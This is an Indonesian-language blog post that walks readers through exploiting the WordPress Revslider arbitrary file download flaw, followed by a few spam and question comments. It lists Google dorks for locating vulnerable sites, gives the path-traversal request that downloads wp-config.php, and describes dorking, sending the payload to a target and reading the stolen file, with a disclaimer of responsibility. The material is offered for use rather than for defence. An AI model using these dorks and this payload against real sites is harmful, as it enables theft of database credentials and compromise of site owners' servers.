Reading
3
Comments
Naufal Ardhani - Halo sobat kali ini saya akan membahas Exploit Wordpress Revslider Arbritary File Download pada exploit ini anda dapat mendownload file file penting yang ada di dalam server web tersebut khususnya web yang menggunakan cms Wordpress tapi tidak semua web yang menggunakan cms tersebut rentan dengan exploit ini.
Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.
Dork :
- inurl:wp-content/plugins/revslider/
- inurl:revslider
- inurl:revslider_admin.php
- inurl:revslider_front.php
- inurl:plugins/revslider/
- intext:Powered by Revslider
- intitle:"Index Of/ revslider"
- intitle:"Index Of/wp-content/themes/revslider"
- intitle:"Index Of/wp-content/plugins/revslider"
- intitle:"Index Of/admin/revslider"
- intitle:"Index Of/fr/revslider"
- intitle:"Index Of/en/revslider"
- intitle:"Index Of/us/revslider"
- intitle:"Index Of/ar/revslider"
- intitle:"Index Of/es/revslider"
- intitle:"Index Of/de/revslider"
Exploit :
- /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Step :
- Dorking dengan dork yang sudah disediakan.
- Disini saya sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
- Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.
Sekian saja Exploit Wordpress Revslider Arbitary File Download Vulnerability yang saya bagikan semoga bermanfaat dan saya tidak bertanggung atas apa yang anda lakukan terimakasih.
Exploit
Internet
Wordpress
3 komentar
Kalo Yang Muncul cuma 0 gimana
BalasHapusThis is very useful post for me. This will absolutely going to help me in my project. push pull force gauge
BalasHapusThe information you have posted is very useful. The sites you have referred was good. Thanks for sharing.. offshore software development services
BalasHapus